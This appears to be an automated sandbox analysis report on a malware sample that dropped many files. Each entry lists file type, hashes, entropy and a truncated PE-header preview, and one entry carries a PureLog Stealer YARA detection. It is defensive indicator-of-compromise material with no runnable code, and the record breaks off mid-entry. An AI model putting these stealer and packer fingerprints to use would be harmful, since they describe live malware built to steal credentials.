                                                      SHA1:2DDC159F8A06218C7622C7CD107598BE1FBD3C99
                                                      SHA-256:D177DC7BA9F3E8511B08293B8CF92AF0BA4DEDD029C9F8365FCF05AFA8375344
                                                      SHA-512:76ED65DC22149C9263C83D73D16A08E99B9137E619FE26AF852ACC2B4AF127C43BD5C6DD2BD16BA117C3432E1422F54157FE6CCB6E9D997E02C776BD52A26BF9
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............P...........@..........................0}.......I...@..................................F2.@.....p..-............I..t....o...............................9. .....o.@.............O.......E.@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp...|..........................`..`.vmp....>.. 1...>.................`..`.reloc........o.......>.............@..@.rsrc....-....p..8....>.............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):11403264
                                                      Entropy (8bit):7.976262170621303
                                                      Encrypted:false
                                                      SSDEEP:196608:SYvZvPF60956XHt6+YF+ELzL2Zjbn2YH0oD6DGcCwHbGkG:3Fcw5kHo5F+E+j7260oOYc
                                                      MD5:D43AC79ABE604CAFFEFE6313617079A3
                                                      SHA1:B3587D3FA524761B207F812E11DD807062892335
                                                      SHA-256:8B750884259DD004300A84505BE782D05FCA2E487A66484765A4A1E357B7C399
                                                      SHA-512:BB22C73ED01FF97B73FEB68AE2611B70EF002D1829035F58A4BA84C5A217DB368AAE8BDC02CDEC59C1121922A207C662AA5F0A93377537DA42657DD787587082
                                                      Malicious:true
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...._3f..........#..........,......`..........@.......................................... .................................................06..d.......X,...Y...*..............................................(....W..8...............h............................text....~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0....,......................... ..`.text1..8...........................@....text2............................`..h.rsrc...X,.........................@..@........................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):224256
                                                      Entropy (8bit):6.9433984885266815
                                                      Encrypted:false
                                                      SSDEEP:6144:3OffmWXp9n7o2qtKn6hMXxhbdmfNYD6W:3Of+Wrn7ovhMXxhEfNYDf
                                                      MD5:1E1FEA74A0F30FDD73BEAEC4B58DF40A
                                                      SHA1:B02535062E46656A73C80EE20EE0D6D4BFDD5D36
                                                      SHA-256:92401CFD60B233D27D1A6EFF87CCED8AA1447BB61F9ABD27F3580AB9DAE24F41
                                                      SHA-512:890418BF3F5A80C66EDAEFDADDE6ACAF847681C246C538C243EC2E25C6BA558B802A9378FBE3920D4A70F045D7C28607BD30C946184EDDE2D0C2DBBC3582B2F3
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...............................................N.............N......Rich............................PE..L....lud.....................P.......>............@..........................`.......b.......................................i..P...................................i..............................@_..@...............d............................text.../........................... ..`.rdata...q.......r..................@..@.data....4.......z...\..............@....rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:HTML document, ASCII text, with very long lines (6927)
                                                      Category:dropped
                                                      Size (bytes):467500
                                                      Entropy (8bit):5.351114150753326
                                                      Encrypted:false
                                                      SSDEEP:12288:MksqektwIB8rI0J0rAmv8K5a2MChtQZBtnI7665:Mksqz5a2MChtQc
                                                      MD5:308243063DD35FB60BE105D128F1B6D7
                                                      SHA1:E586E16BA320B666A74351BF3EA3EF4D57603975
                                                      SHA-256:BB05C001EDD0F8A7DE936D96297A1D7978FDB1F4F6DC0456F0C9AA896FCA929A
                                                      SHA-512:ABFDDA2E5218C23E1BD9D1E0C67A2FA1C55C89249B11D7B0EB7DB569F26624830DDC5C6D43241161775D2721DAB43DE12B295F261A53CBA53DE0354A088AE27F
                                                      Malicious:false
                                                      Preview:<!DOCTYPE html>.<html lang='en' dir='ltr'>.<head>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />..<link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" />..<link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15">..<meta http-equiv="content-type" content="text/html; charset=windows-1251" />.<meta http-equiv="origin-trial" content="AiJEtxZTdbmRu3zkrD0Bg/GvReuip5r0aklN7tIrw1Yit01/+j7PNlJFAyMMo/vqqNVvDmRsGCPGfVtNn5ookQ8AAABueyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJlQVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="theme-color" content="#ffffff">.<meta name="color-scheme" content="light">..<title>Error | VK</title>..<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>.<script nomodule>(function(){"use strict";function e({needRedirect:e}){const n=new XMLHttpRequest;n.open("GET","/badbrowser_stat.php?act=nomodule"),n.send(),e&&window.location.replace
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):363520
                                                      Entropy (8bit):7.566311373125175
                                                      Encrypted:false
                                                      SSDEEP:6144:hKrTm/Wop3oiUklM540oF1zTuoZxFrI/l2k9Joup1JgHEa23sw6ac:8rTm/WohfdFNhhGpIOcYc
                                                      MD5:D79B788762C6435AE9F599743F9F482D
                                                      SHA1:4D96933A654C426776B30B57B49227E812B3D231
                                                      SHA-256:0C9D401E9B393D2E7E2E3C727BA6E3E83CDE22DF260731879A4E5B0350929574
                                                      SHA-512:E6E3A3BE1C171B38A9B167291D2F875C169C04B0AEFE7425092301CDB694C2C052FDC30E770634634C82CA3CCA76507E20D0AFF1EA6DB9076299E10935BB39F9
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...|...|...|..}...|..}...|..}...|..}...|...|V..|.l.}...|.l.}...|.l.}@..|.o.}...|.o.}...|Rich...|........PE..L...rJOf...............'.............F............@.......................................@.................................DY..(....................................?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...dA...p...4...>..............@....reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):80896
                                                      Entropy (8bit):6.015374450878895
                                                      Encrypted:false
                                                      SSDEEP:1536:0k9jHELqei8IP+UzrebBL105tPnNO3ByiGbhwkapILOHn3cUd:0k9jHdeIzrebrCPN2cto
                                                      MD5:0951BF8665040A50D5FB548BE6AC7C1D
                                                      SHA1:59F4315D9953700B41E3CD026054821145DD2E68
                                                      SHA-256:F8E639176247F80ED86FEC07F31735F3381AF3B30F7512F4F9E06A04F0FAB489
                                                      SHA-512:B159DF503A9CFDC0740123D7060918FB1444743417B645C9C28B4FB2AEDEC75660F84F55B3D62A89921B0D76B7AB199DBFE639844A9A11BC6458FB0E06B9FEAD
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....)..........."...0..4............... .....@..... ....................................`...@......@............... ...............................`...............................S..8............................................................ ..H............text....3... ...4.................. ..`.rsrc........`.......6..............@..@........................................H....... !...............-...&...........................................0..L.......(....(.....~......i .....@(..........i(..........(....(....t....o.....(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*V(....r7..p~....o....*.~....*..(....*Vs....(....t.........*..BSJB............v4.0.30319......l.......#~..\.......#Strings....T...<...#US.........#GUID.......@...#Blob...........W..........3........!...............................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):7644698
                                                      Entropy (8bit):7.996957781505089
                                                      Encrypted:true
                                                      SSDEEP:196608:91OJPDSjkypkppi4dISJEL7DuRXTl1/AN+vKH79l2g:3OtGjkWCdyDuRXPcOsP
                                                      MD5:3A2B26A994B7FD53F298B7B94FAF9BC8
                                                      SHA1:447DF9F19FEB0555C0AE39453902F9B979D68127
                                                      SHA-256:934A200AB23782C898F25F26E3F7475B0126CC4F67098D6C877A4D90DCAB22F8
                                                      SHA-512:78BFF37D5D59D068B94D6D6DE3C69BAF29F2499CA0DE3D17912D655DA44776BA90DAB693241433F3F35F9DB044DA890C9318B95DD6D3271CFB65330BA56A8C67
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                      Category:dropped
                                                      Size (bytes):1251
                                                      Entropy (8bit):5.242123603799515
                                                      Encrypted:false
                                                      SSDEEP:24:hYYIzDImyJRA3ZsjNQCRtgoLY95Mu56+eDHHLFCOXAkRcfRrzd0Ll72rKQk:rqLKj2CZLY5Mc6NDLYzkYKLlOM
                                                      MD5:8150F458ED6FB9B1DB4E5CFA57A1A281
                                                      SHA1:6E5726854D28687B560D7FDCB5C782C425C7DFB9
                                                      SHA-256:4C13D452DD5D49671BD93CA32F2B4F85C78E39B6AB0AD1F38D98ED267F8FD896
                                                      SHA-512:4CC6A112673AEF8BB8BB8A385C26791B805D43BB707B509880E894F1C83BAB4E16F13DE187036C5F660C3BEC1D286258396B7BDE65C5D7945C5019665196818C
                                                      Malicious:false
                                                      Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5154288
                                                      Entropy (8bit):7.171492010172408
                                                      Encrypted:false
                                                      SSDEEP:98304:NllmCKfheKnF4Gnuyjscn9GtGOqHLixnkmb0ZKH4lODcxSgo5Gn8WuMRIn+N3gNX:NllmCKfY2uWUMBHLi6mb0ZKH4lODcxSL
                                                      MD5:D9A7D15AE1511095BC12D4FAA9BE6F70
                                                      SHA1:B90FBB35EB6DD050E4829ECAC702FEAB90F58859
                                                      SHA-256:BDC61E24B03DB5DBDEAF7979906EA51F0BFE388B41D8E7E80BDE6D9ACD716BBA
                                                      SHA-512:F913E5BBB998AD8A391EA99C6D045081DA5AF128B9391C3A0249EC4EEB9A504BE796B3315E7C5B4BAE825B7629527719A845A974F4EBA37BD0233B86E5483E25
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe, Author: Joe Security
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8.................P...J..L........K.. ... K...@.. ........................N......GO...@.................................P.K.K.... K..I...........8N..m....N...................................................... ............... ..H............text.....J.. ....J................. ..`.rsrc....I... K..J....J.............@..@.reloc........N......6N.............@..B..................K.....H........=..T...........hY..{.8.........................................6+.(..GJ(....*..:+.(m..1.(....*.V+.(^ Hg..(....8.....*..B+.(6.YT~.......*...6+.() sm~....*...0..........+.(BTd/ ........8........E........3...8....s.........8....*s.........8*...s.........8....s......... .....:....&8....s.........8......0..&.......+.(|.\9.~....o......8....8....8......*...0..+.......+.(.r0k8....8....8.....~....o......8......*..0..&.......+.($R.:.~....o......8....8....8......*...0..&.......
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):4795544
                                                      Entropy (8bit):7.790038180467164
                                                      Encrypted:false
                                                      SSDEEP:98304:ltzqmVRdoYb1nmPuPeHpxCHleUtEz7M9TrZHYErpLHE3OJots3fYa:ltZVR2uwU7EwtrNUs3ff
                                                      MD5:6151F5177B7B35E3D7CEE99A2FC9AF24
                                                      SHA1:2E0C8320FC5C6E11CFFB6A1A5085DB450F0BAF08
                                                      SHA-256:1186878B54CD5CE32FFE84632051A57E9B62C7243187DB25BBAC6C57D2AD67AF
                                                      SHA-512:69A536208B7E228E0AD51842AA00BA3FAEE4C29D952C15DFE90F8C58A3C7AC3CCE61E0FDEAEA2615FC6268459820F468543D52CF62AFD4D2A026E2A517B63031
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............3S...........@...........................|.....i.J...@.................................t.L.@.....o..-............H..t....o...............................3. .....o.@............ U.....(#D.@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp...x..........................`..`.vmp...u>.. 1..v>.................`..`.reloc........o......z>.............@..@.rsrc....-....o..8....>.............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3163136
                                                      Entropy (8bit):7.986527740370475
                                                      Encrypted:false
                                                      SSDEEP:49152:GTMdkMhmlShESVoTFn1G6RFaboRc4eIV6ZEd/E19vakcaojsS0Ms1NVggf:dLY1SsGIOoNeIYFboaoq2gf
                                                      MD5:23B6B09B37D3E4E9A8343F0600518535
                                                      SHA1:F843D3ACE646035E6B0D14420FC3B00808A80EAA
                                                      SHA-256:2263C40DEA71AAD8DE57071B0724CCC4267A169509540F61F612C8385195956E
                                                      SHA-512:47C472583A6321C068392A79C1F194D40641A2E893AD5EC882122DF2C40EBE53257F178AA8A15C13B88C212B620C9CE582F97019340206F4C21F1640B1715685
                                                      Malicious:true
                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L....iLf...............'.....|....................@......................................@... .. .... .. ..........P................`..4...................0........................................................................................................<..................@........................@..............@............P...P.......B..............@............ ...........J..............@....................b...J..............@....rsrc.... ...`......................@..@..........x......(..................@....data....`"..p...X".................@...................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2958197
                                                      Entropy (8bit):7.949334573377899
                                                      Encrypted:false
                                                      SSDEEP:49152:ppUlRhkdMczbk7oBEhGuWOYU7qYg0boGg64GzK7cz5OPeXXyGQ5j/03x3PJbyqQf:ppUlev/iGjU7qH0W64V7k5OPeXXyGQVx
                                                      MD5:BC1B0FB42CCC20C3FA6420B1B1AAA705
                                                      SHA1:7F9C2407E00BCDC1FEB9112F6B2E26B8E9CDE40F
                                                      SHA-256:679F89FC1FA7E63B64FBC1BCBE826E7D91B2861B7D59C11301573D7C2015764C
                                                      SHA-512:2FF53F747C34CCBA1B8A1C4FFB88261EE332FDC5F8199AC206C776C39F4D9B066CA8D9CB36C22B18081B9532FCCE25D7F6E2B1042D2288B4A4BB11FD452ECD7A
                                                      Malicious:true
                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b#Rich2.b#........................PE..L.....@f...............!.............e............@.......................................@.........................p}..4....}..P.......`....................p...*...E..T....................F......X...@...................,r.. ....................text...,........................... ..`.rdata..............................@..@.data................t..............@....didat.......p......................@....rsrc...`...........................@..@.reloc...*...p...,...l..............@..B................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):4791448
                                                      Entropy (8bit):7.801357729474096
                                                      Encrypted:false
                                                      SSDEEP:98304:fvlJEFn6D4/425BLJxuixbvOprXQPmVR64t6Grx+ts3fY:fvlGiS3lPr7OqOR6oMs3f
                                                      MD5:9A78F27AA9D999EEE10CB154BA964869
                                                      SHA1:D1AF2D2D1195415791F59285A9BCFA5EE0880EBD
                                                      SHA-256:CF53B17C2ABC3B8AC0B149E2496726C5C7D67EC0712F56339F2870CA6D616DB6
                                                      SHA-512:B0AB7D1A8492A1A318C10E7402CF36EF22BF80DB77AAC33F744296DCD01B17E438D65D2371FC733AEC28C671CD90DBF6CECB9BC23A9DB1163F183FEB70C7709C
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............5i...........@...........................|.....j.I...@.................................@tl.@.....o..-............H..t....o...............................:. ....lo.@.............m......]l.@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp..$m..........................`..`.vmp...d>...1..f>.................`..`.reloc........o......j>.............@..@.rsrc....-....o..8...p>.............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):470528
                                                      Entropy (8bit):7.711295641924988
                                                      Encrypted:false
                                                      SSDEEP:12288:mQJRsrrQqYvbeUVOyJ3GJNu0ADIJTls9tJBKM1I59rM:akkyJoNYDOsrqM259A
                                                      MD5:E154829A16292C782B579D217E0EA8BF
                                                      SHA1:5D2FB1535930184E7212B5FB780C638F32A03CEE
                                                      SHA-256:132FE6D8E5C0026B4F9E0DE786CCC4A35FC22D86821D230F8D8EA924E825FFBF
                                                      SHA-512:D0ACBC1D810F628107E095959A2C53EF6E58ADCC8631F1AB16353B1294B7F51F13B1FF9936AB5E86AFF2D3C4FAD9C56F3DF263D9F7B27DE8FFA3CD508537A300
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......jL$..-J,.-J,.-J,._I-"-J,._O-.-J,._N-;-J,._K---J,.-K,u-J,.N-<-J,.I-:-J,.O-`-J,.O-/-J,.H-/-J,Rich.-J,........PE..L.....Nf...............'.............I............@.......................................@..................................Y..(............................`..P....?...............................?..@...............@............................text............................... ..`.bSs................................ ..`.rdata.............................@..@.data........p.......@..............@....reloc..P....`......................@..B........................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:HTML document, ASCII text, with very long lines (6927)
                                                      Category:dropped
                                                      Size (bytes):467343
                                                      Entropy (8bit):5.350730362186107
                                                      Encrypted:false
                                                      SSDEEP:12288:MksqektwIB8rI0J0rAmv8u5a2MChtQZBtnI766t:MksqZ5a2MChtQQ
                                                      MD5:E01210CD2D021572AB79679BED6B04F9
                                                      SHA1:C80EBDFEB6B61F1D642D3302D35F3A9D33AD0ED0
                                                      SHA-256:D50DE61A4A264E78F66210C177622954D46D2E97B7DE9A51502D9217C43BA7B6
                                                      SHA-512:01789E10B0EB42F85B8739A67A30F55F9D566D5D7B1A4D4E9EB6602FB6AC9B2CFC0EAC8FD242ADC4B144A756C061D44099DFA5BC7D89D161F99726987D469901
                                                      Malicious:false
                                                      Preview:<!DOCTYPE html>.<html lang='en' dir='ltr'>.<head>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />..<link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" />..<link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15">..<meta http-equiv="content-type" content="text/html; charset=windows-1251" />.<meta http-equiv="origin-trial" content="AiJEtxZTdbmRu3zkrD0Bg/GvReuip5r0aklN7tIrw1Yit01/+j7PNlJFAyMMo/vqqNVvDmRsGCPGfVtNn5ookQ8AAABueyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJlQVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="theme-color" content="#ffffff">.<meta name="color-scheme" content="light">..<title>Error | VK</title>..<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>.<script nomodule>(function(){"use strict";function e({needRedirect:e}){const n=new XMLHttpRequest;n.open("GET","/badbrowser_stat.php?act=nomodule"),n.send(),e&&window.location.replace
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):744960
                                                      Entropy (8bit):7.822971503052979
                                                      Encrypted:false
                                                      SSDEEP:12288:q+dJfgo8vQKBuYVcUOmsIzxGd1OrZ7Ir2YjqF7fKjnmaoBt9WWayr9q0:hgoWQKBuXUtgdAJ2maoBtKyr9q0
                                                      MD5:ADD437E239EBA1CEABCA80AF38F80B56
                                                      SHA1:7D288EB76B3F0B1B3C37A020A61E97D4E43A1450
                                                      SHA-256:2CE2C104C964166CF5FC95D7C855C173533BF28B7053A398BB01E757FD0D94EA
                                                      SHA-512:C6447B5E35F05399EFB4263DB09C2E980F402C2368A06806A37684B0B248635B6F64F51587479D9FE66F833F5C44EA7A571CE7D5F5886A5EB54B6DF30F9A9FD5
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H...)..)..)..{..)..{1..)..{0.)..QB.)..)...)....4.)..{..)......)..Rich.)..........................PE..L...`{]e............................v=....... ....@............................................................................<....@...............................................................x..@............ ..P............................text...#........................... ..`.rdata..Rk... ...l..................@..@.data...........8...|..............@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):228864
                                                      Entropy (8bit):6.12511745585131
                                                      Encrypted:false
                                                      SSDEEP:3072:tneBqhy5aVLOwqI8sgwoEHXfwaNUM+/ORSs5G2Ms4f6TFZbhgvbUxzJ8Y:tETlsgOfDt+/V6JQO98
                                                      MD5:3955AF54FBAC1E43C945F447D92E4108
                                                      SHA1:53C5552C3649619E4E8C6A907B94573F47130FA4
                                                      SHA-256:E6DE332AD778F7A7CF160EFA60656C3AC960DC77806905493D5CFFE58EE1DE16
                                                      SHA-512:FA028A040A5F075296AEBAB7F63A59B6CBBA32EE0964DFC08768396CC012FF5D861191E2478914D79D4A424C3BBA110505A58B97376C44C716F0B1EA70551037
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...sto@sto@sto@!.lA{to@!.jALto@!.kAoto@z..@ato@..nAzto@stn@.to@..jA~to@..mArto@Richsto@........PE..d...A%"^.........."......r..........`;.........@....................................)7....`..................................................o..........0...........................0&..T....................'..(....&..................h............................text....q.......r.................. ..`.rdata..D............v..............@..@.data................f..............@....pdata...............t..............@..@.rsrc...............................@..@.reloc...............v..............@..B................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5664468
                                                      Entropy (8bit):7.999044610836231
                                                      Encrypted:true
                                                      SSDEEP:98304:mNYt51OFL8p2+YKpk7VEP8RUYSFauCcUhk76J+8lyR6SI3OjZy8redrbURI:Co51EA9bk7HRUlFauNUC76gKyRu3OFWF
                                                      MD5:9BDAC0A94009F03D1A0078506200F3CF
                                                      SHA1:CAD96A4EC163D198145C417F7F4EB25312C6300A
                                                      SHA-256:E3555B2ECBB2F4EF7077205D864ADCB6884665CE36C2D8CBFA27EDBEB817DE2F
                                                      SHA-512:E4C6D7246B8CB88EE264E00A2F8ED125D5B0DC250B6EBDE293469FF6929BDD117BE3F90695E1D25350911481FA30F1E518D794ADA7F4A811E19ACF3D09839EEF
                                                      Malicious:true
                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......$.............@..........................@...................@..............................P........,..........................................................................................................CODE....D........................... ..`DATA....L...........................@...BSS.....H................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5382672
                                                      Entropy (8bit):6.621301293389298
                                                      Encrypted:false
                                                      SSDEEP:98304:tfblDCLzsVGzo6WvZ4vALxjloC4/ozr0J:tblO8V+o6dv4iFAnc
                                                      MD5:029B4A16951A6FB1F6A1FDA9B39769B7
                                                      SHA1:A64E56DC24E713637AF0EF71B279F39843E0F0EB
                                                      SHA-256:94DB25630E224DE4D562F408CA6ED1259EAE3645931174FCD57C07AD6933AA61
                                                      SHA-512:3A117B879F96C42387CC088A2F05F441222F0DFBFB4F405F1E09BC03F92CDFB27FFA986A1F9AD4AD1E6E8D2387D3C367A54DCF51A7C2E1F32F48FB15B8406BFC
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p.........................p...........~+....~+.....~+......~+..................Z...O(......O(............O(......Rich....................PE..L.....Mf...............'..!..........MI.......!...@..........................pl......-R...@...................................*.......%......................`l...............................*..................................................... ..!......:.................. ..` N.....!......>..............@..@ .....p$......6..............@....rsrc.........%......F..............@..@ 4.....)..V...(..............@..B.idata........*......~..............@....tls..........*..........................themida..A...*...A.................`....reloc.......`l......"R................@........................................................................................................................
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2562560
                                                      Entropy (8bit):6.889408488852162
                                                      Encrypted:false
                                                      SSDEEP:49152:jxIRJF1HL+VdX68kUSJtTF+TxMoxc1TU+j+dAzGwlrh:jEJF16dX68dStIuoITsdZ
                                                      MD5:A121C97352E79320BD32630542D2E0FE
                                                      SHA1:2FE621FE0ED698F1D56DCD37D3DB2B813EC86DB0
                                                      SHA-256:4E516D1D8FE006A8F47E9AEA8C8302E9426ED7A098690423338206AB02957757
                                                      SHA-512:027FCAC865033516C03CD628DC49BF19BAED40F8549C683D16F16DC10B9B5FB93C7034AB80D80B6A89761723F4DB51970AAF4C110FA8BF083A054E2CF48FBD02
                                                      Malicious:true
                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@...........................'..................@..............................."...p.......................0..H6........................... ......................................................CODE................................ ..`DATA............. ..................@...BSS......................................idata...".......$..................@....tls.....................................rdata....... ......................@..P.reloc..H6...0...8..................@..P.rsrc........p......................@..P..............'.......'.............@..P........................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                      Category:dropped
                                                      Size (bytes):6923264
                                                      Entropy (8bit):7.247307521328743
                                                      Encrypted:false
                                                      SSDEEP:49152:/d84kqSab6V599+xS6Zokh5QK4SbHo/xak/tMw1NxcwCr4RCmUUdr5snBK0PSGUh:/G4kwGb948Aok/+OwVRcwksVsnkL7
                                                      MD5:F0587649682207064554A2372966435D
                                                      SHA1:2E8B948DFCFFCEB8ACF550A585D2EA127F28F41F
